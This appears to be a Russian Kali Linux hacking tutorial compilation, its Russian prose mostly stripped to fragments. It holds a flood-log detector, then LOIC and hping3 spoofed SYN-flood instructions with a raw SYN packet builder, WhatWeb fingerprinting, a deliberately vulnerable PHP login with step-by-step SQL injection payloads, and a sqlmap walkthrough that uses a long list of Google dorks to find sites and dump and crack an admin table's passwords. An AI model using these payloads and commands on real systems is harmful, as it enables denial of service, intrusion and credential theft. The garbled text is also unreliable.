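    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines modelled on the excerpt above; not real traffic.
SAMPLE_LOG = """\
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?vySSDx=tG1rmfX4&CKVuvV=JLoK HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_3_3) AppleWebKit/535.6 (KHTML, like Gecko) Version/6.0.5 Safari/535.17"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?dC1FyXpw=hB6Oh&rjcf74A=YVA HTTP/1.1" 200 69504 "http://www.baidu.com/k1IkNXv" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_4) AppleWebKit/536.12 (KHTML, like Gecko) Chrome/10.0.623.89 Safari/536.26"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?0Nk7p=kSf&1eVF8PNy=UpDtx HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64) Gecko/20021304 Firefox/12.0"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?SAQMIx5Pl=VWGEFj3q8N0 HTTP/1.1" 200 69504 "http://www.google.com/gCqMk2Q05" "Mozilla/5.0 (Linux x86_64; X11) Gecko/20010905 Firefox/17.0"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?jA5Kw=fwtSMfa&Y0fBbDfSXd=8Jm5hqt HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64) Gecko/20011709 Firefox/23.0"
192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?t2U0aYjxm=q21n4BARB1&qxI1=cTw HTTP/1.1" 200 69504 "http://www.baidu.com/bQnoS7ULAY" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/536.10 (KHTML, like Gecko) Chrome/18.0.1844.44 Safari/537.21"
192.168.1.20 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/38.0"
192.168.1.20 - - [18/Jun/2015:17:06:53 +0700] "GET /style.css HTTP/1.1" 200 1204 "http://192.168.1.37/info.php" "Mozilla/5.0 (X11; Linux x86_64) Firefox/38.0"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    # only the parameter names matter: GoldenEye randomises them on every request
    rec["params"] = [k for k, _ in parse_qsl(urlsplit(rec["path"]).query, keep_blank_values=True)]
    return rec


def find_flooders(lines, max_per_second=5, min_requests=5):
    """Group requests by client IP and score each client on the GoldenEye traits."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)

    flagged = {}
    for ip, recs in per_ip.items():
        if len(recs) < min_requests:
            continue
        per_second = defaultdict(int)
        for r in recs:
            per_second[int(r["ts"].timestamp())] += 1
        peak = max(per_second.values())
        names = [p for r in recs for p in r["params"]]
        unique_ratio = len(set(names)) / len(names) if names else 0.0
        agents = {r["ua"] for r in recs}
        referer_hosts = {urlsplit(r["referer"]).hostname for r in recs if r["referer"] != "-"}

        score = 0
        score += peak > max_per_second                                # burst rate
        score += unique_ratio == 1.0 and len(names) >= min_requests   # no parameter name repeats
        score += len(agents) > len(recs) // 2                         # User-Agent rotates
        score += len(referer_hosts) > 1                               # forged referers, several sites
        if score >= 3:
            flagged[ip] = {
                "requests": len(recs),
                "peak_rps": peak,
                "unique_param_ratio": round(unique_ratio, 2),
                "user_agents": len(agents),
                "referer_hosts": sorted(h for h in referer_hosts if h),
            }
    return flagged


if __name__ == "__main__":
    for ip, info in find_flooders(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

To run it against a live server, replace SAMPLE_LOG.splitlines() with the lines of /var/log/apache2/access.log. The thresholds are starting points: a NAT gateway or a forward proxy also produces many requests per second from one address, so the rate alone is weak evidence, which is why the rotating User-Agent and the never-repeating parameter names carry most of the score.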

31. - Low Orbit Ion Cannon (LOIC)


Low Orbit Ion Cannon (LOIC)
Low Orbit Ion Cannon (LOIC) - , ,
, .
.
, ,
- .
Anonymous, DDoS
-,
. , ,
, - ; ,

LOIC .
Low Orbit Ion Cannon (LOIC) Windows
Windows .
. !

Low Orbit Ion Cannon (LOIC) Linux


LOIC Linux, , ,
Kali Linux.
LOIC :
apt-get update
aptitude install git-core monodevelop
apt-get install mono-gmcs

, , Kali Linux, .
Ubuntu, Linux Mint ( Debian),
:
sudo apt-get install mono-complete
, , :
cd ./Desktop
loic, :
mkdir loic

, :
cd ./loic
:
wget https://raw.github.com/nicolargo/loicinstaller/master/loic.sh

:
chmod +x loic.sh
:
./loic.sh install
- ,
loic. , :
./loic.sh update
, LOIC.
:
./loic.sh run

, , Windows (
)? Linux !

- Low Orbit Ion Cannon (LOIC)


LOIC . IRC .
. URL IP .
. Lock on. : TCP, UDP HTTP.
HTTP. . ,

IMMA CHARGIN MAH LAZER. LOIC .


Stop Flooding :

.. ,
Windows Linux. ,
IRC , .
.

32. - : DoS hping3


IP Kali Linux
-- (DoS)
-- (DDoS)
. , DoS
,
, .
, DoS hping3
IP Kali Linux.
, DDoS , , ,
DoS . 2014 ,
DDoS 28 .
DoS
, ,
. --
-.
,

Minecraft. DoS
. ,
; , CPU.
, .
. - .

DoS, mod_evasive mod-qos.


-
.

,
, .
. , DoS
,
,
,
.
DoS .
. - .
- / ,
.
( , ,
), - (
) . .
- .
, , , -
.
hping3 DoS
GoldenEye ( ,
//, ). ,
, DDoS
DoS :
http://www.digitalattackmap.com/
http://map.norsecorp.com/
http://map.ipviking.com/
-- DoS
hping3
, hping3
IP Kali Linux.
, hping3, .
hping3
hping3 TCP/IP . Hping,
,
,
Idle Scan, Nmap.
hping hping3 Tcl.
TCP/IP ,
, ,
TCP/IP .

, ,
hping3 , ,
.
hping3
Traceroute/ping/probe (//)
, .
( nmap
).
.
IDS ( ).
TCP/IP.

TCP/IP (hping AFAIK).
, TCP/IP
.
.
.
,
TCP/IP .
(IDS)
Tk.
hping3 Kali Linux .
.
DoS hping3 IP
, .
:
root@WebWare-Kali:~# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 192.168.1.37
HPING 192.168.1.37 (eth0 192.168.1.37): S set, 40 headers + 120 data bytes
hping in flood mode, no replies will be shown
^C
--- 192.168.1.37 hping statistic ---
3258138 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@WebWare-Kali:~#
:
hping3 = .
-c 10000 = . Note that in the run above --flood kept sending until ^C (3258138 packets, far more than 10000), so do not count on -c to stop a flood.
-d 120 = , .
-S = SYN.
-w 64 = TCP.
-p 21 = ( 21 FTP).
.
--flood = , , . .
--rand-source = IP . -a spoof . man hping3
192.168.1.37 = IP IP .
. ,
, .
, ? hping3
( ,
rand-souce, , IP ).
. top.
:

, .
:

,
.
, si, :
us (User CPU time) ,
sy (System CPU time) ,
ni (Nice CPU time) ,

id
wa (iowait) , -
hi (Hardware IRQ) , hardware-
si (Software Interrupts) , software-
(network)
st (Steal Time) ,
( )
.. si (Software Interrupts) , software-
(network). .

,
Linux SYN .
. , TCP
SYN TCP Connect , IPTables
DoS-, hping3 .
DoS- GoldenEye
- .
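What hping3 puts on the wire for the command above is a 20-byte IPv4 header, a 20-byte TCP header (the "40 headers" in its banner) and 120 data bytes, with the SYN flag set, window 64, destination port 21 and a random source address. The following is an added example written for this page, not hping3's own code: it builds exactly that packet with struct, computes both checksums, and decodes it back so the fields can be checked. The filler byte for the data portion is an assumption; hping3's own choice is not documented on this page. Sending would need a raw socket and root, which is left as a comment.

```python
import random
import socket
import struct

SYN = 0x02


def checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words (IP and TCP use the same routine)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def random_source(rng=random):
    """--rand-source: any 32-bit value as IPv4 source (constructed here; hping3's generator may differ)."""
    return socket.inet_ntoa(struct.pack("!I", rng.getrandbits(32)))


def build_syn(src_ip, dst_ip, dport, sport=None, window=64, data_len=120, rng=random):
    """IPv4 + TCP SYN followed by data_len filler bytes."""
    payload = b"X" * data_len              # filler; the byte value hping3 uses is an assumption
    sport = rng.randint(1024, 65535) if sport is None else sport
    seq = rng.getrandbits(32)
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)

    # TCP header, checksum zeroed: sport, dport, seq, ack, data offset (5 words), flags, window, csum, urg
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, SYN, window, 0, 0)
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, socket.IPPROTO_TCP, len(tcp) + len(payload))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]

    # IPv4 header: ver/IHL, TOS, total length, ID, flags/fragment, TTL, protocol, csum, src, dst
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, rng.getrandbits(16), 0, 64,
                     socket.IPPROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp + payload


def decode_syn(packet):
    """Re-verify both checksums and pull out the fields a receiver or an IDS looks at."""
    ip, tcp, payload = packet[:20], packet[20:40], packet[40:]
    src, dst = ip[12:16], ip[16:20]
    pseudo = struct.pack("!4s4sBBH", src, dst, 0, socket.IPPROTO_TCP, len(tcp) + len(payload))
    sport, dport, seq, ack, offset, flags, window = struct.unpack("!HHIIBBH", tcp[:16])
    return {
        "len": len(packet),
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
        "sport": sport, "dport": dport, "flags": flags, "window": window,
        "ip_ok": checksum(ip) == 0,                      # a correct checksum field sums to zero
        "tcp_ok": checksum(pseudo + tcp + payload) == 0,
    }


if __name__ == "__main__":
    pkt = build_syn(random_source(), "192.168.1.37", 21)
    print(decode_syn(pkt))
    # To send: socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW).sendto(pkt, ("192.168.1.37", 0))
    # (needs root; the kernel leaves the supplied IPv4 header as is)
```

Because the source address is forged, the SYN-ACK the target sends goes to a host that never sent anything, which is why hping3 reports 100% packet loss and why SYN cookies, not replying faster, are the defence: the half-open entry never gets allocated at all.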

5. -
33. WhatWeb:
Kali Linux
WhatWeb
-
. ,
.
.
Powered by. ,
. ,
.
WhatWeb.
, , Powered by ( ,
, -

).
:
whatweb http://www1.hut.ru/forum/
whatweb ,
http://www1.hut.ru/forum/ .

, :
PoweredBy[phpBB]
phpBB[2]
.. phpBB .
, PHP, -, IP ,
- Google AdSense.
, .
:
whatweb webware.biz

, .

WhatWeb
WordPress, :
whatweb -a 3 webware.biz
:
whatweb webware.biz zalinux.ru mi-al.ru

, WhatWeb .
,
( Nmap):
whatweb 185.26.122.0/24

WhatWeb
.
input-file=, -i URL, , -i
/dev/stdin
,
WhatWeb :
echo 'webware.biz' | whatweb -i /dev/stdin
.
aggression, -a=
1, 3 4.
1 , 3 , 4 ,
.

user-agent, -U= WhatWeb/0.4.8-dev.



header, -H HTTP. "Foo:Bar". ,
. , ,
"User-Agent:", .
follow-redirect= .
`never', `http-only', `meta-only', `same-site', `same-domain' `always'.
: always
max-redirects= . : 10
WhatWeb :
user, -u=<user:password>
header, , header "Cookie: SESSID=1a2b3c;"
WhatWeb:
proxy <hostname[:port]> . : 8080
proxy-user <username:password>
WhatWeb ,
/:
, , . .

, (
) README.TXT, . .
, . ,
, , .

.
,
,
, , .
: "" ,
HTML-, ,
:

, ,

.

,
.
, .
(README.TXT, . .). , WordPress
, , ..
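WhatWeb's output such as PoweredBy[phpBB] and phpBB[2] comes from plugins that match regular expressions against response headers and the HTML body. The following is an added example written for this page, not WhatWeb's own code or plugin format: a handful of signatures of the same kind run over one constructed response (headers and body are made up, not a real site), which is what the passive aggression level 1 does with a single request. Real WhatWeb ships far more plugins and, at levels 3 and 4, sends extra requests to confirm versions.

```python
import re

# Constructed response in the style of what WhatWeb sees; not a real site.
SAMPLE_HEADERS = {
    "Server": "Apache/2.4.10 (Debian)",
    "X-Powered-By": "PHP/5.6.9",
    "Set-Cookie": "phpbb2mysql_sid=0123abcd; path=/",
}
SAMPLE_BODY = """<html><head>
<meta name="generator" content="WordPress 4.2.2">
<script src="/wp-content/themes/twentyfifteen/js/skip-link-focus-fix.js"></script>
<script src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
</head><body>
<p>Powered by <a href="http://www.phpbb.com/">phpBB</a> &copy; 2001, 2005 phpBB Group</p>
</body></html>"""

# (plugin name, where to look, pattern, capture group holding the version or None)
SIGNATURES = [
    ("Apache",    "header:Server",       r"Apache(?:/([\d.]+))?", 1),
    ("PHP",       "header:X-Powered-By", r"PHP/([\d.]+)", 1),
    ("phpBB",     "header:Set-Cookie",   r"phpbb(\d)?mysql_sid", 1),
    ("phpBB",     "body",                r"Powered by <a href=\"http://www\.phpbb\.com/\">phpBB</a>", None),
    ("WordPress", "body",                r"<meta name=\"generator\" content=\"WordPress ([\d.]+)\"", 1),
    ("WordPress", "body",                r"/wp-content/", None),
    ("AdSense",   "body",                r"pagead2\.googlesyndication\.com", None),
    ("PoweredBy", "body",                r"Powered by\s*(?:<[^>]+>)?\s*([A-Za-z][\w.-]*)", 1),
]


def fingerprint(headers, body):
    """Run every signature; return {plugin: sorted list of versions seen}."""
    found = {}
    for name, where, pattern, vgroup in SIGNATURES:
        haystack = body if where == "body" else headers.get(where.split(":", 1)[1], "")
        m = re.search(pattern, haystack, re.IGNORECASE)
        if not m:
            continue
        found.setdefault(name, set())
        version = m.group(vgroup) if vgroup else None   # None when the optional group did not match
        if version:
            found[name].add(version)
    return {k: sorted(v) for k, v in found.items()}


def whatweb_style(found):
    """Format like WhatWeb's brief output: Name[version] or just Name."""
    return ", ".join(f"{n}[{','.join(v)}]" if v else n for n, v in sorted(found.items()))


if __name__ == "__main__":
    print(whatweb_style(fingerprint(SAMPLE_HEADERS, SAMPLE_BODY)))
```

The phpBB version here comes from the session cookie name (phpbb2mysql_sid), which is the kind of indirect evidence the real plugins rely on; a site that renames cookies or strips the Server and X-Powered-By headers defeats this level of scan, which is exactly the hardening the text recommends.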

34. SQL-:
( 1)
SQL-
, :
: , .
. .
:

SQL- : , , ( ).
.
. : ,
,
SQL-, , .
, SQL- :
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title></title>
</head>
<body>
<h2>:</h2>
<form method="get" action="?">
<p> </p>
<input name="name" type="text">
<p> </p>
<input name="password" type="text"><br />
<input type="submit">
</form>
<?php
$mysqli = new mysqli("localhost", "root", "", "db_library");
if (mysqli_connect_errno()) {
    printf(" : %s\n", mysqli_connect_error());
    exit();
} else {
    $mysqli->query("SET NAMES UTF8");
    $mysqli->query("SET CHARACTER SET UTF8");
    $mysqli->query("SET character_set_client = UTF8");
    $mysqli->query("SET character_set_connection = UTF8");
    $mysqli->query("SET character_set_results = UTF8");
}
$name = filter_input(INPUT_GET, 'name');
$password = filter_input(INPUT_GET, 'password');
// Deliberately vulnerable: both GET values are pasted into the SQL text without escaping.
if ($result = $mysqli->query("SELECT * FROM `members` WHERE name = '$name' AND password = '$password'")) {
    while ($obj = $result->fetch_object()) {
        echo "<p><b> : </b> $obj->name</p>
        <p><b> :</b> $obj->status</p>
        <p><b> :</b> $obj->books</p><hr />";
    }
} else {
    // Deliberately leaks the database error to the browser, which the walkthrough relies on.
    printf(": %s\n", $mysqli->error);
}
$mysqli->close();
?>
</body>
</html>
, .
. : index.php db_library.sql. index.php

.
db_library.sql , , phpMyAdmin.
index.php root,
. , :
$mysqli = new mysqli("localhost", "root", "", "db_library");
, - .
: Demo, 111.

, ,
. , (
) .
, ,
.
, , :
SELECT * FROM `members` WHERE name = '$name' AND password ='$password'
SELECT SQL- , . ,
SELECT name, SELECT name, password.
, .
, . .. SELECT *
.
FROM . FROM , . .
FROM `members` , `members`.
WHERE, - ,
. ,
(1) (0).
(name = '$name') AND (password ='$password')
, , $name
name '$password
password .
( ), ., . .
SELECT * FROM `members` WHERE name = '$name' AND password
='$password' : `members` ,
,
.
. , ,
:

:
http://localhost/test/mysql-inj-lab1/index.php?name=Demo'&password=111

, :
: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '111'' at line 1
, :
SELECT * FROM `members` WHERE name = 'Demo' AND password ='111'
, :
SELECT * FROM `members` WHERE name = 'Demo' ' AND password ='111'
, . . :
SELECT * FROM `members` WHERE name = 'Demo'
, . ,
:
' AND password ='111'
- ,
. , , :
SELECT * FROM `members` WHERE name = 'Demo' ' ' AND password ='111'
:
http://localhost/test/mysql-inj-lab1/index.php?name=Demo''&password=111

, .
. ?
.
MySQL :
# ( )
( , )

/* */ ,
, , ,
.
,
, , +, ,
:
SELECT * FROM `members` WHERE name = 'Demo' --+ ' AND password ='111'
:
http://localhost/test/mysql-inj-lab1/index.php?name=Demo'--+&password=111
, Demo.
:
SELECT * FROM `members` WHERE name = 'Demo'
--+ ' AND password ='111'
.
:
SELECT * FROM `members` WHERE name = 'Demo'
! .. ,
, . ..
SQL-.
, -
.
:
WHERE name = 'Demo'
AND, ?
. , (1)
. (1)
. .. :
WHERE name = 'Demo' OR 1
, 1.
1.
.. , :
SELECT * FROM `members` WHERE name = 'Demo' OR 1

:
http://localhost/test/mysql-inj-lab1/index.php?name=Demo' OR 1 --+&password=111

! .
ORDER BY UNION SQL-
, ,
. - ? ,
(, . ,

!
UNION SQL-. ,
UNION .
SQL- .
UNION SQL- SELECT,
. :
SELECT SELECT.
ORDER BY .
, . ,
, :

:
http://localhost/test/mysql-inj-lab1/index.php?name=-1' ORDER BY 1 --+&password=111
:
SELECT * FROM `members` WHERE name = '-1' ORDER BY 1
-1 .

, :
SELECT * FROM `members` WHERE name = '-1' ORDER BY 2
SELECT * FROM `members` WHERE name = '-1' ORDER BY 3
SELECT * FROM `members` WHERE name = '-1' ORDER BY 4
SELECT * FROM `members` WHERE name = '-1' ORDER BY 5
:
SELECT * FROM `members` WHERE name = '-1' ORDER BY 6
:
http://localhost/test/mysql-inj-lab1/index.php?name=-1' ORDER BY 6 --+&password=111
:
: Unknown column '6' in 'order clause'

, .
UNION:
, SELECT ,
. , ,
. NULL
.
SELECT * FROM `members` WHERE name = '-1' UNION SELECT 1,2,3,4,5
:
http://localhost/test/mysql-inj-lab1/index.php?name=-1' UNION SELECT 1,2,3,4,5 --+&password=111
:

UNION.
:
SELECT * FROM `members` WHERE name = '-1' UNION SELECT 1
SELECT * FROM `members` WHERE name = '-1' UNION SELECT 1,2
SELECT * FROM `members` WHERE name = '-1' UNION SELECT 1,2,3
SELECT * FROM `members` WHERE name = '-1' UNION SELECT 1,2,3,4
:
: The used SELECT statements have a different number of columns

.
, UNION SELECT 1,2,3,4,5
. .
SELECT
, UNION:
DATABASE()
CURRENT_USER()
@@datadir
USER()
VERSION()
2, 4 5. ..
.
DATABASE() UNION SELECT
:
http://localhost/test/mysql-inj-lab1/index.php?name=-1' UNION SELECT 1,2,3,4,DATABASE() --+&password=111
CURRENT_USER() UNION SELECT


:
http://localhost/test/mysql-inj-lab1/index.php?name=-1' UNION SELECT 1,2,3,4,CURRENT_USER() --+&password=111
:

@@datadir UNION SELECT


:
http://localhost/test/mysql-inj-lab1/index.php?name=-1' UNION SELECT 1,2,3,4,@@datadir --+&password=111
:

,
information_schema , tables.
,
. , table_schema
'db_library' ( DATABASE()).
UNION. .
MySQL UNION .
:
: Illegal mix of collations for operation 'UNION'
- , sqlmap
:
something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
, MySQL 5.6. ..
,
,
UNION. ,
.
UNION,
: ,

, .
, SQL- UNION,
:
SQLMAP Kali Linux: - SQL-

: SQL-
sqlmap Windows

.. , LIMIT. LIMIT SQL-


.

35. SQLMAP Kali Linux: -


SQL-
Windows, "
sqlmap Windows". ,
" : SQL-".
, , Kali Linux,
, ? ,
- . , ,
,
. ()
, -
. , PHP,
, !
-
.

SQLMAP,
SQL-.
, , , ,
.
SQL- , ,
, ( ) SQL
(,
). SQL-
, ,
, SQL ,
.
SQL- -,
SQL .
SQLMAP SQL- Kali
Linux , , - ( , )
Kali Linux.
: Kali Linux,
Kali Linux:
.
, WebWare.biz
Kali Linux.
SQLMAP
sqlmap ,
SQL-
.
,

,

.

MySQL, Oracle,
PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,
Sybase SAP MaxDB.
SQL-: ,
, , UNION ,
.
SQL-
, IP ,
.
, , , ,
, .

.

, , ,
.

.
,
.
, , ,
, name
pass ( ).
()
, MySQL,
PostgreSQL Microsoft SQL Server.

, ,
MySQL, PostgreSQL
Microsoft SQL Server.
(out-of-band) TCP

. ,
Meterpreter (VNC)
.
Metasploit
Meterpreter.
, ,
- , , .
- , .
, .
, :

1: -
, , ,
. , Google Dorks , .
, , ,
. - ,
, .

1.: Google Dorks SQLMAP SQL -

. .
, .
, .

Google Dork strings (one per line):
inurl:item_id=
inurl:review.php?id=
inurl:hosting_info.php?id=
inurl:newsid=
inurl:iniziativa.php?in=
inurl:gallery.php?id=
inurl:trainers.php?id=
inurl:curriculum.php?id=
inurl:rub.php?idr=
inurl:news-full.php?id=
inurl:labels.php?id=
inurl:view_faq.php?id=
inurl:news_display.php?getid=
inurl:story.php?id=
inurl:artikelinfo.php?id=
inurl:index2.php?option=
inurl:look.php?ID=
inurl:detail.php?ID=
inurl:readnews.php?id=
inurl:newsone.php?id=
inurl:index.php?=
inurl:top10.php?cat=
inurl:aboutbook.php?id=
inurl:profile_view.php?id=
inurl:newsone.php?id=
inurl:material.php?id=
inurl:category.php?id=
inurl:event.php?id=
inurl:opinions.php?id=
inurl:publications.php?id=
inurl:product-item.php?id=
inurl:announce.php?id=
inurl:fellows.php?id=
inurl:sql.php?id=
inurl:rub.php?idr=
inurl:downloads_info.php?id=
inurl:index.php?catid=
inurl:galeri_info.php?l=
inurl:prod_info.php?id=
inurl:news.php?catid=
inurl:tekst.php?idt=
inurl:shop.php?do=part&id=
inurl:index.php?id=
inurl:newscat.php?id=
inurl:productinfo.php?id=
inurl:newsticker_info.php?idn=
inurl:news.php?id=
inurl:collectionitem.php?id=
inurl:index.php?id=
inurl:rubrika.php?idr=
inurl:band_info.php?id=
inurl:trainers.php?id=
inurl:rubp.php?idr=
inurl:product.php?id=
inurl:buy.php?category=
inurl:offer.php?idf=
inurl:releases.php?id=
inurl:article.php?ID=
inurl:art.php?idm=
inurl:ray.php?id=
inurl:play_old.php?id=
inurl:title.php?id=
inurl:produit.php?id=
inurl:declaration_more.php?decl_id=
inurl:news_view.php?id=
inurl:pop.php?id=
inurl:pageid=
inurl:select_biblio.php?id=
inurl:shopping.php?id=
inurl:games.php?id=
inurl:humor.php?id=
inurl:productdetail.php?id=
inurl:page.php?file=
inurl:aboutbook.php?id=
inurl:post.php?id=
inurl:newsDetail.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:viewshowdetail.php?id=
inurl:fiche_spectacle.php?id=
inurl:gallery.php?id=
inurl:clubpage.php?id=
inurl:communique_detail.php?id=
inurl:article.php?id=
inurl:memberInfo.php?id=
inurl:show.php?id=
inurl:sem.php3?id=
inurl:section.php?id=
inurl:staff_id=
inurl:kategorie.php4?id=
inurl:theme.php?id=
inurl:newsitem.php?num=
inurl:news.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:readnews.php?id=
inurl:index.php?id=
inurl:top10.php?cat=
inurl:faq2.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:historialeer.php?num=
inurl:show_an.php?id=
inurl:reagir.php?num=
inurl:preview.php?id=
inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num=
inurl:loadpsb.php?id=
inurl:transcript.php?id=
inurl:forum_bds.php?num=
inurl:opinions.php?id=
inurl:channel_id=
inurl:game.php?id=
inurl:spr.php?id=
inurl:aboutbook.php?id=
inurl:view_product.php?id=
inurl:pages.php?id=
inurl:preview.php?id=
inurl:newsone.php?id=
inurl:announce.php?id=
inurl:loadpsb.php?id=
inurl:sw_comment.php?id=
inurl:clanek.php4?id=
inurl:pages.php?id=
inurl:news.php?id=
inurl:participant.php?id=
inurl:avd_start.php?avd=
inurl:download.php?id=
inurl:event.php?id=
inurl:main.php?id=
inurl:product-item.php?id=
inurl:review.php?id=
inurl:sql.php?id=
inurl:chappies.php?id=
inurl:material.php?id=
inurl:read.php?id=
inurl:clanek.php4?id=
inurl:prod_detail.php?id=
inurl:announce.php?id=
inurl:viewphoto.php?id=
inurl:chappies.php?id=
inurl:article.php?id=
inurl:read.php?id=
inurl:person.php?id=
inurl:viewapp.php?id=
inurl:productinfo.php?id=
inurl:viewphoto.php?id=
inurl:showimg.php?id=
inurl:rub.php?idr=
inurl:view.php?id=
inurl:galeri_info.php?l=
inurl:website.php?id=

1.: , -
SQLMAP SQL-
, ,
. , SQLMAP SQL-
. , ,
, .
, inurl:rubrika.php?idr=, -
:
http://www.sqldummywebsite.name/rubrika.php?id=28

' URL. ( "


, ' ).
:
http://www.sqldummywebsite.name/rubrika.php?id=28'

SQL , SQLMAP SQL-.


,
.
.

SQLi
Microsoft SQL Server
Server Error in / Application. Unclosed quotation mark before the character string attack;
Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string attack;.

MySQL
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near at line 12

Oracle
java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors
Query failed: ERROR: unterminated quoted string at or near

2: SQLMAP SQL-
, -
SQLMAP SQL-.
( ).
SQLMAP, , .
-:
sqlmap -u http://www.sqldummywebsite.name/rubrika.php?id=31 --dbs

:
sqlmap = sqlmap
-u = (. http://www.sqldummywebsite.name/rubrika.php?id=31)
--dbs =

:
web server operating system: Linux Gentoo
web application technology: Nginx, PHP 5.3.29
back-end DBMS: MySQL 5.0.11
[18:47:01] [INFO] resumed: information_schema
[18:47:01] [INFO] resumed: laminat
, , ,
information_schema MYSQL.
, laminat.

3. ,
SQLMAP SQL-
-
. :
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat --tables

, 18 :
[18:52:25] [INFO] fetching tables for database: 'laminat'
[18:52:25] [INFO] fetching number of tables for database 'laminat'
[18:52:25] [INFO] resumed: 18
[18:52:25] [INFO] resumed: admin
[18:52:25] [INFO] resumed: browser
[18:52:25] [INFO] resumed: diskuse
[18:52:25] [INFO] resumed: diskuse_obor
[18:52:25] [INFO] resumed: diskuse_tema
[18:52:25] [INFO] resumed: historie
[18:52:25] [INFO] resumed: mag_admvolby
[18:52:25] [INFO] resumed: mag_anketa
[18:52:25] [INFO] resumed: mag_autori
[18:52:25] [INFO] resuming partial value: mag_cla
[18:52:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:52:25] [INFO] retrieved: ori
[18:54:23] [INFO] retrieved: mag_claori...

, admin, SQLMAP SQL-


, , , .

4:
SQLMAP SQL-
admin
-, SQLMAP SQL-. SQLMAP SQL-
, :
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin --columns

[19:57:42] [INFO] fetching columns for table 'admin' in database 'laminat'
[19:57:42] [INFO] resumed: 5
[19:57:42] [INFO] resumed: id
[19:57:42] [INFO] resumed: int(2)
[19:57:42] [INFO] resumed: login
[19:57:42] [INFO] resumed: v
[19:57:42] [INFO] resumed: heslo
[19:57:42] [INFO] resumed: varchar(32)
[19:57:42] [INFO] resumed: jmeno
[19:57:42] [INFO] resumed: varchar(20)
[19:57:42] [INFO] resumed: stupen
[19:57:42] [INFO] resumed: int(1)
Database: laminat
Table: admin
[5 columns]
+--------+--------------------+
| Column | Type               |
+--------+--------------------+
| heslo  | varchar(32)        |
| id     | int(2)             |
| jmeno  | varchar(20)        |
| login  | v                  |
| stupen | int(1)             |
+--------+--------------------+

! , . ,
:
heslo
stupen
login .
.. .

5: SQLMAP SQL-

SQLMAP SQL- ! :
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin --dump

. , ,
, , ,
:
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C login --dump
.
, .
.

6: SQLMAP SQL-

, . , :
sqlmap -u www.sqldummywebsite.name/rubrika.php?id=31 -D laminat -T admin -C heslo --dump
!! .
, . - . -
, -
.
. . ,
.

, - , sqlmap .
, , do you want to store hashes to a temporary file for eventual
further processing with other tools, . . ,
. .
do you want to crack them via a dictionary-based attack?,
, , .
, , , .
:
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) (
Enter)
